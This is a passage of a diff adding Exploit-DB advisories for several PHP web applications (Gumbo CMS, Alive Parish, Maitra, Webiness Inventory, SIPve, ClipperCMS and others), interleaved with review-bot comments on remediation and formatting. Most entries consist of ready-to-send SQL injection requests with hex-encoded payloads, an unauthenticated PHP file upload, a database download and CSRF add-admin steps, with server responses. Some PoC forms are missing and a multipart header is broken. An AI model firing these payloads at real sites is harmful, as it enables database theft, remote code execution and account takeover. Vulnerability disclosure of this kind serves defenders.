PHPSESSID=q4h99gt9616juhb7qvkehf0u87; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: http://192.168.1.27/exploitdb/abc_v_0_6_4/?id=login +Content-Length: 187 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html;charset=utf-8 + +# POC: +# 3) +# http://localhost/[PATH]/admin/run/_configurar_perfil.php +# + + +
+
+ Datos del Usuario +
    +
  1. + + +
  2. +
  3. + + (sólo se modificará si escribe algún valor) +
  4. +
  5. + + (sólo se modificará si escribe algún valor) +
  6. +
  7. + + +
  8. +
  9. + + +
  10. +
+
+
+ + +
+
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45837.txt b/exploits/php/webapps/45837.txt new file mode 100644 index 000000000..9e3c8ff88 --- /dev/null +++ b/exploits/php/webapps/45837.txt @@ -0,0 +1,38 @@ +# Exploit Title: Gumbo CMS 0.99 - SQL Injection +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://gumbo-cms.net/ +# Software Link: https://netix.dl.sourceforge.net/project/gumbo-cms/0.99%20beta/gumbo-0.99beta.zip +# Version: 0.99 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Users... +# http://localhost/[PATH]/settings/en +# +POST /[PATH]/settings/en HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: general_purpose=791f2pg746e79031nl9e69kjp2 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 268 +language=fr2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||' +HTTP/1.1 200 OK +Date: Sat, 10 Nov 2018 23:49:54 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 710 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45838.txt b/exploits/php/webapps/45838.txt new file mode 100644 index 000000000..5003b0e10 --- /dev/null +++ b/exploits/php/webapps/45838.txt 
@@ -0,0 +1,34 @@ +# Exploit Title: Silurus Classifieds Script 2.0 - SQL Injection +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://snowhall.com/store/silurus/ +# Software Link: https://netcologne.dl.sourceforge.net/project/silurus/silurus_2.0.zip +# Version: 2.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/wcategory.php?ID=[SQL] +# +GET /[PATH]/wcategory.php?ID=%36%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=9ujoo8291nqkbribmilpl0sdo3; __utma=112705988.1527518065.1541929662.1541929662.1541929662.1; __utmb=112705988.1.10.1541929662; __utmc=112705988; __utmz=112705988.1541929662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 08:48:25 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file 
diff --git a/exploits/php/webapps/45839.txt b/exploits/php/webapps/45839.txt new file mode 100644 index 000000000..5bc1639cc --- /dev/null +++ b/exploits/php/webapps/45839.txt 
@@ -0,0 +1,82 @@ +# Exploit Title: ClipperCMS 1.3.3 File Upload CSRF Vulnerability +# Date: 2018-11-11 +# Exploit Author: Ameer Pornillos +# Website: http://ethicalhackers.club +# Vendor Homepage: http://www.clippercms.com/ +# Software Link: https://github.com/ClipperCMS/ClipperCMS/releases/tag/clipper_1.3.3 +# Version: 1.3.3 +# Tested on: Windows 10 x64 (XAMPP, Firefox) +# CVE : CVE-2018-19135 + +* Description: + +ClipperCMS 1.3.3 does not have CSRF protection on its kcfinder file upload +which is being used by default. This can be used by an attacker to perform +actions for an admin (or any user with file upload capability). With this +vulnerability, it can automatically upload file/s (by default it allows +aac,au,avi,css,cache,doc,docx,gz,gzip,htm,html,js,mp3,mp4,mpeg,mpg,ods,odp,odt,pdf,ppt,pptx,rar,tar,tgz,txt,wav,wmv,xls,xlsx,xml,z,zip +as file types). Note that web shell that can be used for remote code +execution can be achieved depending on the file types being accepted. +Uploaded file can be accessed publicly on the "/assets/files" directory +(e.g. uploaded a malicious html file with filename: poc.html file => +http:///clipper/assets/files/poc.html). +This can lead for the website to be host unintended file/s. + +*Steps to reproduce: + +Admin (or user with file upload capability) logged in ClipperCMS 1.3.3 -> +browse/open a controlled website (e.g. by link or open PoC below in a +browser where admin/user logged in to ClipperCMS 1.3.3) with the poc below +-> file is uploaded and can be accessed on http:// +/clipper/assets/files/poc.html + +*Proof of Concept: + +PoC below will automatically upload a "poc.html" file with simple XSS +payload. Steps above are how to make use of the PoC. + + + + + + + + +*Proof of Concept Demo: + +Actual video demo of the vulnerability being exploited is available on: +https://youtu.be/bEYqb99MdYs + +*Reference: + +https://github.com/ClipperCMS/ClipperCMS/issues/494 \ No newline at end of file 
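Review bot: The description's own default type list (`aac,au,avi,css,cache,doc,docx,gz,gzip,htm,html,js,...`) is the point to make explicit: because `htm`, `html` and `js` are accepted and uploads are served from `/assets/files` on the site's own origin, a CSRF-triggered upload becomes stored same-origin script, which is why the PoC's `poc.html` is described as carrying an XSS payload. Remediation is therefore twofold and the advisory should say so: an anti-CSRF token on the kcfinder upload endpoint (the issue tracked as ClipperCMS/ClipperCMS#494), and removing active content types from the default list or serving `/assets/files` with `Content-Disposition: attachment` or from a separate origin. The HTML PoC itself appears to have been stripped from the text as shown here.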
diff --git a/exploits/php/webapps/45840.txt b/exploits/php/webapps/45840.txt new file mode 100644 index 000000000..059d9dd9f --- /dev/null +++ b/exploits/php/webapps/45840.txt @@ -0,0 +1,48 @@ +# Exploit Title: Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://demo.aliveparish.com +# Software Link: https://netcologne.dl.sourceforge.net/project/aliveparish/aliveparish-v2.0.zip +# Version: 2.0.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/parish/search?key=[SQL] +# +GET /[PATH]/parish/search?key=%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=d98c14a2b1f274925e7993331153a20d +Connection: keep-alive +HTTP/2.0 500 Internal Server Error +Server: nginx +Date: Sun, 11 Nov 2018 09:18:22 GMT +Content-Type: text/html; charset=UTF-8 +x-powered-by: PHP/7.1.16 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +X-Firefox-Spdy: h2 + +# POC: +# 2) +# http://localhost/[PATH]/person/photo/1 +# +# http://localhost/[PATH]/images/uploaded/[FILE] +# + + +
+ + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45841.txt b/exploits/php/webapps/45841.txt new file mode 100644 index 000000000..1a0ab8cd4 --- /dev/null +++ b/exploits/php/webapps/45841.txt 
@@ -0,0 +1,70 @@ +# Exploit Title: Maitra - Mail Tracking System 1.7.2 - SQL Injection / Database File Download +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://salzertechnologies.com/ +# Software Link: https://netcologne.dl.sourceforge.net/project/maitra/maitra/maitra-desktop-v1.7.2.zip +# Version: 1.7.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# Server : Mongoose web server v.5.6 [FREE EDITION] +# Default listening_port: 8080,8081,8082 + +# POC: +# 1) +# http://localhost/[PATH]/application/db/maitra.sqlite +# +GET /[PATH]/application/db/maitra.sqlite HTTP/1.1 +Host: TARGET:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 11:04:24 GMT +Last-Modified: Sun, 11 Nov 2018 10:46:47 GMT +Etag: "5be80897.1114112" +Content-Type: text/plain +Content-Length: 1114112 +Connection: keep-alive +Accept-Ranges: bytes + +# POC: +# 2) +# http://localhost/[PATH]/?c=outmail&m=outmailentry&mailid=[SQL] +# +GET /[PATH]/?c=outmail&m=outmailentry&mailid=-1)%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2csqlite_version()%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2d%2d HTTP/1.1 +Host: TARGET:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: 
ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b +Connection: keep-alive +HTTP/1.1 200 OK +X-Powered-By: PHP/5.5.10 +Set-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:48:15 GMT; Max-Age=7200; path=/ +Content-Type: text/html +Transfer-Encoding: chunked + +# POC: +# 3) +# http://localhost/[PATH]/?c=inmail&m=inmailentry&mailid=[SQL] +# +GET /[PATH]/?c=inmail&m=inmailentry&mailid=%2d%31%29%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%73%71%6c%69%74%65%5f%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2d%2d HTTP/1.1 +Host: TARGET:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; 
rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229bc792cd7f3df106dfaa30c4f9838dfb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541931921%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D23567922d51348e5db91632764ff616f7d5670ad +Connection: keep-alive +HTTP/1.1 200 OK +X-Powered-By: PHP/5.5.10 +Set-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:44:07 GMT; Max-Age=7200; path=/ +Set-Cookie: 
ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:44:07 GMT; Max-Age=7200; path=/ +Content-Type: text/html +Transfer-Encoding: chunked \ No newline at end of file diff --git a/exploits/php/webapps/45842.txt b/exploits/php/webapps/45842.txt new file mode 100644 index 000000000..fe8f2a46e --- /dev/null +++ b/exploits/php/webapps/45842.txt 
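Review bot: PoC 2 and PoC 3 are sent with a `ci_session` cookie whose serialized payload contains `logged_in;b:1` and `login_name` `mail`, so both injections appear to require an authenticated session, but the advisory never states that precondition; add a line such as `# Note: requests 2 and 3 were issued with a valid logged-in ci_session` (or show that they succeed without the cookie), since it changes the severity. The cookie values are the tester's own session artifacts (IP `192.168.1.27`, signature trailer) and add nothing; trimming them to `Cookie: ci_session=[VALID SESSION]` would keep the requests readable. PoC 1 is a plain fetch of `application/db/maitra.sqlite` answered with 200 and 1114112 bytes — the description could state explicitly that the SQLite database is served from the web root, which is the fact a deployer needs in order to block it.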
@@ -0,0 +1,146 @@ +# Exploit Title: Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery Add Admin) +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://github.com/webiness/webiness_inventory +# Software Link: https://kent.dl.sourceforge.net/project/webinessinventory/2.3/webiness_inventory-2.3.zip +# Version: 2.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php +# +# http://localhost/[PATH]/runtime/PartnerModel/[FILE] +# +POST /[PATH]/protected/library/ajax/WsSaveToModel.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------19855571512095910543502690828 +Content-Length: 384 +-----------------------------19855571512095910543502690828 +Content-Disposition: form-data; name="model_name" +PartnerModel +-----------------------------19855571512095910543502690828 +Content-Disposition: form-data; name="logo"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------19855571512095910543502690828-- +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 16:57:15 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# +GET /[PATH]/runtime/PartnerModel/phpinfo.php HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: 
Sun, 11 Nov 2018 16:58:27 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php +# +# http://localhost/[PATH]/runtime/PartnerModel/[FILE] +# + + +
+ + + +
+ + + +# POC: +# 3) +# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php +# + + +
+ + + + + + + verified account? + active account? + +
+ + + +# +POST /[PATH]/protected/library/ajax/WsSaveToModel.php HTTP/1.1 +Host: 192.168.1.27 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------712753139516771986337452300 +Content-Length: 989 +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="model_name" +Ws_userModel +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="id" +66 +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="email" +efe@omerefe.com +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="password" +efe +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="user_salt" +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="is_verified" +1 +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="is_active" +1 +-----------------------------712753139516771986337452300 +Content-Disposition: form-data; name="verification_code" +-----------------------------712753139516771986337452300-- +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 17:19:11 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +/* `exploitdb`.`ws_user` */ +$ws_user = array( + array('id' => '66','email' => 'efe@omerefe.com','password' => 'f91f01637f051f2d44d6ee847e4bd339e7f89aab11ace6ab30c6c0af9d0f91fdcf90deb1e01a26320fe551c778c26ed57501f8cab4a026d3eaffbacdd3838794','user_salt' => 
'29tevoxs9n8lygh1w4xagv4j0w5w4q4ti3nokzsm0655zjl2ci','is_verified' => '1','is_active' => '1','verification_code' => '') +); \ No newline at end of file diff --git a/exploits/php/webapps/45843.txt b/exploits/php/webapps/45843.txt new file mode 100644 index 000000000..3f48fd2ce --- /dev/null +++ b/exploits/php/webapps/45843.txt 
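Review bot: The `Content-Type: multipart/form-data; boundary=` header in PoC 1 and PoC 3 is separated from its boundary value, which lands on the following line as `---------------------------19855571512095910543502690828` (and `...712753139516771986337452300` in PoC 3); as pasted the request declares an empty boundary and cannot be parsed, so header and value belong on one line. The HTML forms for PoC 2 and PoC 3 are also absent from the hunk — only blank added lines and the stray labels `verified account?` / `active account?` remain — so the CSRF add-admin finding has no reproducible body. PoC 1 is issued without any session cookie and still returns 200 followed by a fetchable `runtime/PartnerModel/phpinfo.php`; stating explicitly that `WsSaveToModel.php` accepts uploads unauthenticated would make the more serious of the two findings unambiguous.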
@@ -0,0 +1,32 @@ +# Exploit Title: Webiness Inventory 2.3 - SQL Injection +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://github.com/webiness/webiness_inventory +# Software Link: https://kent.dl.sourceforge.net/project/webinessinventory/2.3/webiness_inventory-2.3.zip +# Version: 2.3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/protected/library/ajax/WsModelGrid.php +# +POST /[PATH]/protected/library/ajax/WsModelGrid.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 541 +model=PartnerModel&order=%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%3d%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 +HTTP/1.1 500 Internal Server Error +Date: Sun, 11 Nov 2018 16:16:54 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 315 +Connection: close +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45844.txt b/exploits/php/webapps/45844.txt new file mode 100644 index 000000000..51a624717 --- /dev/null +++ b/exploits/php/webapps/45844.txt 
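Review bot: The injected parameter is never named in plain text — the `order` field in `model=PartnerModel&order=%28%53...` is fully hex-encoded, and neither the `# POC` comment nor the index title (`Webiness Inventory 2.3 - SQL Injection`, in the CSV hunk further down) mentions it, unlike sibling entries that use the `'param' SQL Injection` form. Add it to the comment block, e.g. `# http://localhost/[PATH]/protected/library/ajax/WsModelGrid.php (POST: model, order=[SQL])`, and show the payload in readable form next to the encoded one so the vulnerable sink can be identified from the advisory alone. The only evidence of success is `HTTP/1.1 500 Internal Server Error` with a 315-byte body that is not shown; quoting the relevant line of that body would separate a genuine injection from an unrelated error.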
@@ -0,0 +1,81 @@ +# Exploit Title: SIPve 0.0.2-R19 - SQL Injection +# Dork: N/A +# Date: 2018-11-11 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://sourceforge.net/projects/sipve/ +# Software Link: https://datapacket.dl.sourceforge.net/project/sipve/sipve-v0.0.2-R19.tar.gz +# Version: 0.0.2-R19 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/monitorasoc/view/monitorasocAcc.php?usuario=[SQL]&accion=asociar +# +GET /[PATH]/monitorasoc/view/monitorasocAcc.php?usuario=%31%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%45%66%65%29%2d%2d%20%45%66%65&accion=asociar HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=p5kifla1c6ge33dkui0eijm2e2 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 11 Nov 2018 18:56:49 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Sat, 26 Jul 1997 05:00:00 GMT +Cache-Control: no-cache, must-revalidate +Pragma: no-cache +Keep-Alive: timeout=5, max=94 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/grupo/view/getGrupoFuncionLoaded.php?idgrupo=[SQL]&accion=1 +# +GET /[PATH]/grupo/view/getGrupoFuncionLoaded.php?idgrupo=%31%27%29%20%52%4c%49%4b%45%20%28%53%45%4c%45%43%54%20%28%43%41%53%45%20%57%48%45%4e%20%28%36%36%3d%36%36%29%20%54%48%45%4e%20%31%20%45%4c%53%45%20%30%78%32%38%20%45%4e%44%29%29%2d%2d%20%45%66%65&accion=1 